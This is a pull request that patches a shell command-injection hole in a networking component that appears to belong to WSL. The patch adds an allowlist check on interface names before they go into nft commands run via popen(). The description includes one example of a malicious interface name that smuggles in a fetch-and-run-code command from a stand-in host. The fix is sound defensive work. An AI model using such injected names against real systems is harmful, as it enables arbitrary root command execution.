### PR TITLE
Reject shell metacharacters in interface names used by nft commands

### DIFF
--- a/src/linux/init/GnsEngine.cpp
+++ b/src/linux/init/GnsEngine.cpp
@@ -24,6 +24,27 @@ constexpr auto c_ipStrings = {"ip", "ip6"};
 
 const char* c_loopbackInterfaceName = "lo";
 
+namespace {
+
+// Validates that an interface name is safe to interpolate into a shell command line
+// (i.e. as an argument to UtilExecCommandLine, which uses popen()). The Linux kernel
+// only rejects interface names that are empty, ".", "..", contain '/' or whitespace,
+// or are >= IFNAMSIZ; characters like ';', '$', '&', '|', '`', '(', ')', '<', '>',
+// '*', '?', backslash, and quotes are all permitted at the kernel level but are
+// shell metacharacters. This helper enforces a stricter allowlist that covers all
+// real-world interface names (eth0, eth0.100, eth0:1, br-abc, veth-abc123, etc.)
+// while rejecting any character that could alter shell parsing.
+void ValidateInterfaceNameForShell(std::string_view name)
+{
+    constexpr std::string_view c_allowed = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789._:@-";
+    if (name.empty() || name.find_first_not_of(c_allowed) != std::string_view::npos)
+    {
+        throw RuntimeErrorWithSourceLocation(std::format("Interface name contains characters not safe for shell interpolation: '{}'", name));
+    }
+}
+
+} // namespace
+
 GnsEngine::GnsEngine(
     wsl::shared::SocketChannel& channel,
     const NotificationRoutine& notificationRoutine,
@@ -640,6 +661,10 @@ std::tuple<bool, int> GnsEngine::ProcessNextMessage(wsl::shared::Transaction& tr
     {
         auto interfaceNetFilterRequest = wsl::shared::FromJson<wsl::shared::hns::InterfaceNetFilterRequest>(payload->Json.c_str());
         auto interface = OpenInterfaceOrAdapter(interfaceNetFilterRequest.targetDeviceName);
+
+        // The interface name is interpolated into nft command lines run via popen() below.
+        // Reject names containing shell metacharacters before any UtilExecCommandLine call.
+        ValidateInterfaceNameForShell(interface.Name());
 
         GNS_LOG_INFO(
             "LxGnsMessageInterfaceNetFilter for interface {} {{operation={}, startPort={}, endPort={}}}",


### PR DESCRIPTION
Reject shell metacharacters in network interface names before interpolating them into `nft` command lines.

## Problem

`GnsEngine::ProcessNextMessage` (`src/linux/init/GnsEngine.cpp:642-700`) handles `LxGnsMessageInterfaceNetFilter` by building `nft` command strings that include `interface.Name()` and passing them to `UtilExecCommandLine`, which uses `popen()` and is therefore parsed by the shell:

`cpp
const auto commandLine = std::format(
    ""nft add rule {} nat WSLPOSTROUTING oif {} {} sport 1-65535 mark != 0x1 counter masquerade to :{}-{}"",
    ip,
    interface.Name().c_str(),  // <-- interpolated into shell command
    protocol, ...);
THROW_LAST_ERROR_IF(UtilExecCommandLine(commandLine.c_str()) < 0);
`

The interface name originates from the JSON `InterfaceNetFilterRequest.targetDeviceName` field. `Interface::Open()` simply stores the supplied name and asks the kernel for its index — the name itself is never re-fetched from the kernel. The Linux kernel's `dev_valid_name()` only rejects names that are empty, `"".""`, `""..""`, `>= IFNAMSIZ` characters long, or contain `/` or whitespace. **Shell metacharacters such as `;`, `\$`, `&`, `|`, backtick, `(`, `)`, `<`, `>`, `*`, `?`, backslash, and quotes are all valid Linux interface names** and pass straight through to the shell.

A caller able to provide a malicious `targetDeviceName` (e.g. an attacker who can create a network interface in the VM with a name like `eth0;curl evil|sh`) could therefore execute arbitrary commands as root inside the VM.

## Fix

Add a small `ValidateInterfaceNameForShell()` helper in `GnsEngine.cpp`'s anonymous namespace that enforces a strict `[a-zA-Z0-9._:@-]+` allowlist, and call it once in the `LxGnsMessageInterfaceNetFilter` handler immediately after `OpenInterfaceOrAdapter`. The allowlist covers every real-world Linux interface name shape (`eth0`, `eth0.100`, `eth0:1`, `br-abc12345`, `veth-foo`, `docker0`, `enp3s0`, ...) while rejecting any character that could alter shell parsing.

Validation lives at the danger point (right before the only block of code that interpolates the name into `UtilExecCommandLine`) so other consumers of `Interface::Name()` (netlink calls, `/proc/sys/net` paths) are unaffected.

## Risk

Low. The allowlist is strictly a superset of every interface name shape used by Linux distributions and WSL networking modes (NAT, mirrored, virtio-net, bridged). On a violation, `ProcessNextMessage` throws and the filter request is rejected ΓÇö which is the correct behavior, since the request was malformed in a security-relevant way. No legitimate request should ever produce such a name.
